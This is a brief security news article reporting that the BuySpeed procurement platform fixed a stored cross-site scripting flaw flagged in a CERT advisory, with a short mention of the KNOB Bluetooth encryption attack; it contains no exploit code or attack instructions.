Public Procurement Portal BuySpeed Fixes Cybersecurity Flaw

Cybersecurity

Procure-to-pay tool BuySpeed, which is used by government entities, was vulnerable to a zero-day, cross-site scripting flaw that has reportedly been resolved, SC Media reported.

The CERT Coordination Center at Carnegie Mellon University’s Software Engineering Institute, which had said it was not aware of a practical solution to the bug, had published a vulnerability advisory on the bug found in version 14.5 of the product.

Periscope Holdings, which owns BuySpeed, said in a statement per the outlet, “We were aware of CERT Vulnerability Note VU#660597. We have already developed remediation and have made this available to customers. We are alerting CERT of the remediation so they can correct their advisory.”

CERT had noted in its advisory that the flaw “could allow a local, authenticated attacker to store arbitrary JavaScript within the application. This JavaScript is subsequently displayed by the application without sanitization, leading to it executing in the browser of the user. This could potentially allow for website redirection, session hijacking, or information disclosure.”

Periscope Holdings, which is based in Texas, assists with commodities and services procurement in the public vertical via a range of offerings for sellers and buyers. BuySpeed has the only license to keep, improve and market the commodity/services code of the National Institute of Governmental Purchasing (NIGP). It also handles the NIGP Consulting Program.

In separate security news, a Bluetooth security flaw was discovered in August that could leave the data of users unprotected and susceptible to hackers. The vulnerability was found by researchers that made a presentation of their findings at the USENIX Security Symposium.

A “Key Negotiation Of Bluetooth” attack, which is also abbreviated as KNOB, interferes with the Bluetooth connections of users and convinces them to make a short encryption key that is simple to hack.

At the time, the researchers had indicated that Bluetooth chips from multiple tech companies were vulnerable to the attack. But it was noted that Bluetooth Low Energy was not affected.